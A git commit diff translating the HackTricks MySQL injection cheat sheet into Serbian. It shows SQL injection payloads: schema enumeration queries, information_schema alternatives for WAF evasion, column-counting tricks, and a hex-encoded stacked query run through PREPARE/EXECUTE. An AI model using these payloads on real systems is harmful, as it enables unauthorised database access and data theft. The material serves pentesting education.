Translated ['pentesting-web/sql-injection/mysql-injection/README.md'] to

This commit is contained in:
Translator 2024-11-27 18:13:55 +00:00
parent e936cb58fc
commit 17b598f15a

View file

@ -1,16 +1,16 @@
# MySQL injection # MySQL injection
{% hint style="success" %} {% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\ Učite i vežbajte AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte) Učite i vežbajte GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary>Support HackTricks</summary> <summary>Podržite HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! * Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili **pratite** nas na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. * **Podelite hakerske trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
</details> </details>
{% endhint %} {% endhint %}
@ -21,7 +21,7 @@ Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-s
{% embed url="https://www.rootedcon.com/" %} {% embed url="https://www.rootedcon.com/" %}
## Comments ## Komentari
```sql ```sql
-- MYSQL Comment -- MYSQL Comment
# MYSQL Comment # MYSQL Comment
@ -69,7 +69,7 @@ from [https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/]
## Tok ## Tok
Zapamtite da u "modernim" verzijama **MySQL** možete zameniti "_**information\_schema.tables**_" sa "_**mysql.innodb\_table\_stats**_**"** (Ovo može biti korisno za zaobilaženje WAF-ova). Zapamtite da u "modernim" verzijama **MySQL** možete zameniti "_**information\_schema.tables**_" za "_**mysql.innodb\_table\_stats**_**"** (Ovo može biti korisno za zaobilaženje WAF-ova).
```sql ```sql
SELECT table_name FROM information_schema.tables WHERE table_schema=database();#Get name of the tables SELECT table_name FROM information_schema.tables WHERE table_schema=database();#Get name of the tables
SELECT column_name FROM information_schema.columns WHERE table_name="<TABLE_NAME>"; #Get name of the columns of the table SELECT column_name FROM information_schema.columns WHERE table_name="<TABLE_NAME>"; #Get name of the columns of the table
@ -122,7 +122,15 @@ UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...
## WAF bypass trikovi ## WAF bypass trikovi
### Alternatives to information\_schema ### Izvršavanje upita kroz Pripremljene Izjave
Kada su složeni upiti dozvoljeni, može biti moguće zaobići WAF-ove dodeljivanjem heksadecimalne reprezentacije upita koji želite da izvršite (koristeći SET) varijabli, a zatim koristiti PREPARE i EXECUTE MySQL izjave da konačno izvršite upit. Nešto poput ovoga:
```
0); SET @query = 0x53454c45435420534c454550283129; PREPARE stmt FROM @query; EXECUTE stmt; #
```
Za više informacija, molimo vas da se obratite [ovom blog postu](https://karmainsecurity.com/impresscms-from-unauthenticated-sqli-to-rce).
### Information\_schema alternatives
Zapamtite da u "modernim" verzijama **MySQL** možete zameniti _**information\_schema.tables**_ sa _**mysql.innodb\_table\_stats**_ ili sa _**sys.x$schema\_flattened\_keys**_ ili sa **sys.schema\_table\_statistics** Zapamtite da u "modernim" verzijama **MySQL** možete zameniti _**information\_schema.tables**_ sa _**mysql.innodb\_table\_stats**_ ili sa _**sys.x$schema\_flattened\_keys**_ ili sa **sys.schema\_table\_statistics**
@ -134,7 +142,7 @@ Izaberite 2 kolone bez korišćenja bilo kakvog zareza ([https://security.stacke
``` ```
### Preuzimanje vrednosti bez imena kolone ### Preuzimanje vrednosti bez imena kolone
Ako u nekom trenutku znate ime tabele, ali ne znate imena kolona unutar tabele, možete pokušati da saznate koliko kolona ima izvršavajući nešto poput: Ako u nekom trenutku znate ime tabele, ali ne znate imena kolona unutar tabele, možete pokušati da saznate koliko kolona ima izvršavanjem nečega poput:
```bash ```bash
# When a True is returned, you have found the number of columns # When a True is returned, you have found the number of columns
select (select "", "") = (SELECT * from demo limit 1); # 2columns select (select "", "") = (SELECT * from demo limit 1); # 2columns
@ -167,7 +175,7 @@ mysql> select version();
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure> <figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
[**RootedCON**](https://www.rootedcon.com/) je najrelevantnija sajber bezbednosna manifestacija u **Španiji** i jedna od najvažnijih u **Evropi**. Sa **misijom promovisanja tehničkog znanja**, ovaj kongres je vrelo okupljalište za profesionalce u tehnologiji i sajber bezbednosti u svakoj disciplini. [**RootedCON**](https://www.rootedcon.com/) je najrelevantnija sajber bezbednosna manifestacija u **Španiji** i jedna od najvažnijih u **Evropi**. Sa **misijom promovisanja tehničkog znanja**, ovaj kongres je vrelo mesto okupljanja za profesionalce u tehnologiji i sajber bezbednosti u svakoj disciplini.
{% embed url="https://www.rootedcon.com/" %} {% embed url="https://www.rootedcon.com/" %}